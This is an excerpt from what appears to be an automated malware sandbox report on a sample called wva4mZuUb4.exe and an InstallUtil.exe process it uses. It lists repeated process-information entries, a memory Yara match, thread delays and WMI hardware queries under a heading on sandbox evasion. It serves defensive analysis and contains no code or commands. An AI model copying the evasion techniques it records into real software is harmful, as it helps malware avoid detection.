                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: wva4mZuUb4.exe PID: 7312, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 4DA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 7D50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 8D50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 8F10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 9F10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: A280000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeMemory allocated: 7D50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeWindow / User API: threadDelayed 1516Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeWindow / User API: threadDelayed 8332Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8488Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exe TID: 7824Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exe TID: 7824Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3180Thread sleep count: 1375 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3180Thread sleep count: 8488 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599765s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599218s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599109s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -599000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598890s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598672s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598453s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598343s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598234s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598125s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -598015s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597906s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597796s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597687s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597578s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597468s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597359s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597250s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597140s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -597031s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596921s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596812s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596703s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596593s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596484s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596375s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596265s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596156s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -596046s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595937s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595828s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595718s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595609s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595500s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595390s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595281s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595172s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -595062s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -594953s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424Thread sleep time: -594843s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\wva4mZuUb4.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
